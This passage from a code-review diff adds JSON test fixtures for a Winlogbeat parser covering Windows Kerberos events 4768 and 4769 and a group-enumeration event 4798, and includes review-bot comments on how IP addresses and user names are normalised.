:\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service 
:\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", + "event": { + "action": "Service d\u2019authentification Kerberos", + "code": "4768", + "kind": "event", + "module": 
"security", + "original": "Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount\n\tNom du domaine Kerberos fourni :\tDOMAIN\n\tID de l\u2019utilisateur :\t\t\tS-1-2-3\n\nInformations sur le service :\n\tNom du service :\t\tservice\n\tID du service :\t\tS-1-2-3-4-5\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t51261\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810010\n\tCode de r\u00e9sultat :\t\t0x0\n\tType de chiffrement du ticket :\t0x12\n\tType de pr\u00e9-authentification :\t2\n\nInformations sur le certificat :\n\tNom de l\u2019\u00e9metteur du certificat :\t\t\n\tNum\u00e9ro de s\u00e9rie du certificat :\t\n\t Empreinte num\u00e9rique du certificat :\t\t\n\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\n\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:10.124000Z", + "action": { + "id": 4768, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "51261", + "PreAuthType": "2", + "ServiceName": "service", + "ServiceSid": "S-1-2-3-4-5", + "Status": "0x0", + "TargetDomainName": "DOMAIN", + "TargetSid": "S-1-2-3", + "TargetUserName": "account", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810010" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOSTNAME.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + 
"account" + ] + }, + "service": { + "name": "service" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 51261 + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "account", + "target": { + "domain": "DOMAIN", + "name": "account" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOSTNAME.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4768", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 3228 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587536", + "task": "Service d\u2019authentification Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json new file mode 100644 index 000000000..7b1f0f39d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4769.json 
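Review bot: The expected `source.ip`, `source.address` and `related.ip` for this 4768 fixture are `::ffff:102:304`, i.e. the input `IpAddress` `::ffff:1.2.3.4` is kept as an IPv4-mapped IPv6 address in hex form rather than unmapped to `1.2.3.4`, and the same event still carries the dotted form in `action.properties.IpAddress`. Detection rules, allow-lists and enrichment keyed on the dotted-quad will not match `source.ip` in this form, and `related.ip` will not correlate with 4624/4625-style events that report the plain IPv4 address. The normalisation happens in the parser, which is not in this diff, so either the fixture should expect `"ip": "1.2.3.4"` once the parser unmaps `::ffff:` prefixes, or the mapped form is intentional and the fixture should say so; the 4769 fixture (next hunk) pins the same value. Separately, `user.name` and `user.target.name` are both `account` here, which may be expected since 4768 has only one account field (`TargetUserName`), but confirm that mapping the requesting principal to `user.target.*` is the intended ECS reading.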
@@ -0,0 +1,101 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du 
client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires 
:\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": 
"Microsoft-Windows-Security-Auditing", + "record_id": "2476587153", + "task": "Op\u00e9rations de ticket du service Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json new file mode 100644 index 000000000..b69049f3d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4798.json 
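Review bot: In this 4769 fixture the single input field `TargetUserName` (`account@DOMAIN.PRIV`) is pinned as `user.name: "account"` with the UPN suffix stripped but as `user.target.name: "account@DOMAIN.PRIV"` with it kept, and `related.user` only holds the stripped form. If the parser is supposed to normalise the principal, the target copy should probably be normalised the same way (or `user.target` dropped, since 4769 describes a service ticket request rather than an action on another account); if the asymmetry is deliberate, a short comment in the PR description would save the next reader from treating it as a bug. The `::ffff:102:304` value in `source.ip` and `related.ip` is the same point raised on the 4768 hunk.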
@@ -0,0 +1,114 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program 
Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon 
ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", 
+ "event": {
+ "action": "User Account Management",
+ "code": "4798",
+ "kind": "event",
+ "module": "security",
